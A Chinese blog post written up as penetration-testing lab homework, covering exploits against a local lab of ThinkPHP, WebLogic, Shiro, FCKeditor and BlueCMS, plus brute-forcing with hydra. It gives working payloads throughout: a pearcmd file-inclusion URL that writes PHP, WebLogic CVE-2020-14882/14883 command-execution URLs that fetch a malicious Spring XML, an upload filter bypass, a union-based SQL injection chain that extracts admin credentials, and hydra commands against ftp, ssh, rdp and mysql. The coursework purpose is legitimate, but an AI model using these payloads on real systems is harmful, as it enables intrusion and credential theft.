首页 > 其他分享 >11-RCE、编辑器漏洞、旁注、hydra练习

11-RCE、编辑器漏洞、旁注、hydra练习

时间:2024-11-16 14:41:21浏览次数:1  
标签:11 10.0 .. 漏洞 admin 旁注 0.154 hydra php

1、RCE:分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程

  • ThinkPHP

    满足条件:多语言特性开启、安装pear库、知道pearcmd.php路径、register_argc_argv = on的前提下且ThinkPHP在漏洞版本中,再实现漏洞过程。

    • 前端访问pearcmd文件,出现如下报错确定文件存在

      image-20241115124824185

    • 插入代码实现文件包含(由于前端会进行url编码,需要利用burp抓包成功绕过过滤)

      ?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?
      =phpinfo()?>+/var/www/html/info.php
      

      image-20241115130940086

      image-20241115131224383

    • 访问文件地址,RCE成功实现

      image-20241115131330610

  • Weblogic

    满足条件:Weblogic在相应漏洞版本中

    • CVE-2020-14882(未授权访问到管理后台页面)

      http://10.0.0.151:7001/console/css/%252e%252e%252fconsole.portal
      

      image-20241115133625477

    • CVE-2020-14883(在管理后台页面执行远程命令)

      方式一:

      • 将含有恶意xml代码上传到事先准备好的模拟攻击者靶场中

        <?xml version="1.0" encoding="UTF-8" ?>
        <beans xmlns="http://www.springframework.org/schema/beans"
           xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
            <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
                <constructor-arg>
                  <list>
                    <value>bash</value>
                    <value>-c</value>
                    <value><![CDATA[touch /tmp/test01]]></value> 
                  </list>
                </constructor-arg>
            </bean>
        </beans>
        

        image-20241115134501097

      • 让weblogic后台访问恶意xml文件的url并执行其中的代码

        http://10.0.0.151:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://10.0.0.151:8081/hackable/uploads/test01.xml")
        

        image-20241115140614048

      • 在后台看到创建出的test01文件,说明rce成功

        image-20241115140022337

      方式二:

      • 直接访问如下url执行xml命令,后台创建test02文件

        http://10.0.0.151:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/test02');")
        

        image-20241115140145941

  • Shiro

    满足条件:shiro在相应漏洞版本中

    • CVE-2016-4437(反序列化漏洞)

      • 使用反序化工具实现

        image-20241115143654276

    • CVE-2020-1957(权限绕过漏洞)

      • 通过构造恶意请求 /xxx/..;/admin/ ,即可绕过权限校验,直接访问到管理页面

        image-20241115144704649

2、FCKeditor编辑器漏洞实验

满足条件:Windows 7 + phpstudy_64(php 5.4.45)

  • 利用御剑获取fckeditor目录文件信息

    • 得到本版信息,及上传功能点的url

      image-20241115150125652

    • 插入/图像- - ->链接- - ->Browse Server,会出现FCK上传页面

      image-20241115150818136

    • 由于搭建的站点使用的是php环境,而链接中的环境是ASP,需要对地址以及fckeditor的配置文件进行修改

      地址asp均改为php:

      http://10.0.0.154/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/php/connector.php

      配置文件路径:C:\phpstudy_pro\WWW\FCKeditor\editor\filemanager\browser\default\connectors\php\config.php

      image-20241115151814675

    • 可以正常访问后,burp抓包绕过网站过滤(在php文件后添加空格)成功上传php文件

      image-20241115152755782

    • 根据前面的配置文件构造出路径并访问,成功实现FCKeditor编辑器漏洞http://10.0.0.154/FCKeditor/editor/filemanager/browser/default/images/file/info.phpimage-20241115153328973

3、bluecms旁注漏洞,并解释为什么旁站攻击可以拿下主站?跨库的意思是什么?

  • bluecms旁注漏洞实现

    • 在bluecms首页用(admin/123456)尝试用户登入,从返回消息看推测存在admin用户且存在后台

    image-20241116115725477

    • 通过尝试试出后台为http://10.0.0.154/bluecms/uploads/admin/,这时就可以利用burp进行密码爆破了

      image-20241116121909387

    • 通过账号密码(admin/admin)成功登入后台,在广告管理模块随便添加一条广告后,发现有获取js代码的功能

      image-20241116122232105

    • 通过获取到的js代码,推测网站可能存在sql注入漏洞;访问url验证,确实存在

      image-20241116122547251

      image-20241116122810180

    • 开始进行sql注入测试

      • 先通过order by来判断sql语句查了多少列,当大于7的时候报错,证明有一共有7列

      • 再利用union all 判断显示位 > 7

        -1 union all select 1,2,3,4,5,6,7
        

        image-20241116123620994

      • 获取库名 > bluecms

        -1 union all select 1,2,3,4,5,6,database()
        

        image-20241116123856845

      • 表名 > 关键表名blue_user

        -1 union all select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()
        

        image-20241116125031763

      • 字段名 > 关键字段user_name,pwd

        -1 union all select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='blue_user'
        

        由于网站对单引号过滤,需要对bluecms使用16进制编码绕过

        -1 union all select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x626c75655f75736572
        

        image-20241116130725409

      • 具体数据 > admin/admin

        -1 union all select 1,2,3,4,5,6,concat(user_name,0x7e,pwd) from blue_user
        

        image-20241116132253777

        后面的字符串通过MD5解码得到密码为admin。

        image-20241116132534235

  • 旁站攻击可以拿下主站的原因:因为旁站和主站部署在同一服务器上,所以拿下旁站服务器即得到整个数据库信息,将主站便可一并拿下。

  • 跨库:存在A,B数据库部署在同一服务器上,且他们都隶属于整个MySQL数据库管理系统中;通过在A数据库里查询到B数据库信息即跨库。

4、暴力猜解:hydra实现对ftp、ssh、rdp、mysql的暴力破解。

以win7为实验对象(IP地址-10.0.0.154),kali(自带hydra工具)为模拟攻击者

  • ftp(环境:在win7先利用小皮创建ftp服务并开启)

    hydra 10.0.0.154 ftp -l xue -P pwd.txt -vV -f -e ns
    

    image-20241116135840107

    访问ftp://10.0.0.154服务器,利用破解密码成功登入

    image-20241116140559483

  • ssh(环境:在win7中先安装openssh)

    hydra 10.0.0.154 ssh -l xue -P pwd.txt -t 5 -vV -e nsr -o ssh.log
    

    image-20241116140933299

  • rdp(先在win7中开启远程桌面)

    hydra 10.0.0.154 rdp -l xue -P pwd.txt
    

    image-20241116141158208

    尝试远程连接

    image-20241116141300061

    利用破解的密码连接成功

    image-20241116141549254

  • mysql(在win7先用小皮开启mysql服务>安装数据库管理工具SQL_Front5.3)

    进入工具,设置MySQL允许远程连接即添加 grant all privileges on *.* to root@'%' identified by 'root';语句,选中右键选择运行

    image-20241116143449693

    hydra 10.0.0.154 mysql -l root -P pwd.txt
    

    image-20241116141744202

标签:11,10.0,..,漏洞,admin,旁注,0.154,hydra,php
From: https://www.cnblogs.com/bokexiLu/p/18549352

相关文章

  • 2024-11-16 特殊矩阵的压缩存储
    一、数组的存储结构1.一维数组:各元素大小相同,且物理上连续存放。a[i]=起始地址+i*siezof(数组元素大小)2.二维数组:b[j][j]=起始地址+(i*N+j)*sizeof(数组元素大小)二、特殊矩阵1.普通矩阵的存储:使用二维数组来存储。2.对称矩阵的压缩存储:若n阶方阵中任意一个元素aij都有ai......
  • 11/16
    Link。注意到,如果最后一个保留的数为\(i\),那么事实上可以取得数列一定是一个以\(i\)结尾的上升子序列和下降子序列交叉拼在一起而成,所以树状数组即可。Link。人类智慧可以发现操作次数不会太多,暴力即可。Link。本身并不难,转化难。设\(f(S)\)表示子集\(S\)构成的图连......
  • Metasploit Pro 4.22.5-2024111401 (Linux, Windows) - 专业渗透测试框架
    MetasploitPro4.22.5-2024111401(Linux,Windows)-专业渗透测试框架Rapid7Penetrationtesting,releasedNov14,2024请访问原文链接:https://sysin.org/blog/metasploit-pro-4/查看最新版。原创作品,转载请保留出处。作者主页:sysin.org世界上最广泛使用的渗透测试框......
  • 20141116电路板维修入门之集成电路代换技巧篇
    一、直接代换直接代换是指用其他IC不经任何改动而直接取代原来的IC,代换后不影响机器的主要性能与指标。其代换原则是:代换IC的功能、性能指标、封装形式、引脚用途、引脚序号和间隔等几方面均相同。其中IC的功能相同不仅指功能相同;还应注意逻辑极性相同,即输出输入电平极性、电......
  • [LeetCode] 911. Online Election
    Youaregiventwointegerarrayspersonsandtimes.Inanelection,theithvotewascastforpersons[i]attimetimes[i].Foreachqueryatatimet,findthepersonthatwasleadingtheelectionattimet.Votescastattimetwillcounttowardsourque......
  • 11/15
    好讨厌现在的自己我的能量太低了需要不断的慰藉我喜欢逃避野心家,思想家,我真的sb没有成就感绝望绝望绝望绝望绝望今天很drama,不想说什么了,难受,以后再写明天计划C语言5题【今天少了一道】下午去比赛前端考核作业【1/2】可能睡觉睡少了,不开心?洗洗睡了......
  • 2024.11.15 Codeforces Round 987(Div. 2)
    Solved:5/6Rank:74比赛链接A.PenchickandModernMonument给定一个不增序列,修改最少的数字使其不降。全都修改为出现次数最多的数即可。#include<bits/stdc++.h>usingnamespacestd;typedeflonglongll;voidsolve(){intn;cin>>n;vector<int>a(n);......
  • [鲜花] 20241115 My(self+life).
    它是我的生命。我透过明亮的镜子看过去,是我与我的生命的像,还有它的影子,还有那些...意料之外,情理之中。或许我早就感知到它的存在,生活中总是能感觉到它的温度:触碰到了它的体感肌肤,传递冷暖于我。我想找到它,或者说:我想找到属于我自己的东西。可在我轻微的挪动之后,它彻底不见了。从......
  • Alpha冲刺(3/14)——2024.11.14
    目录一、团队成员分工与进度二、成员任务问题及处理方式三、冲刺会议内容记录会议内容四、GitHub签入记录及项目运行截图GitHub签入记录五、项目开发进展及燃尽图项目开发进展燃尽图六、团队成员贡献表一、团队成员分工与进度成员完成的任务完成的任务时长剩余时间施......
  • 项目冲刺11.15
    这个作业属于哪个课程计科22级34班这个作业要求在哪里作业要求这个作业的目标进行为期七天的项目冲刺并记录前言本篇博客是项目冲刺的第七篇,七篇博客的汇总如下:博客汇总第一篇博客第二篇博客第三篇博客第四篇博客第五篇博客第六篇博客......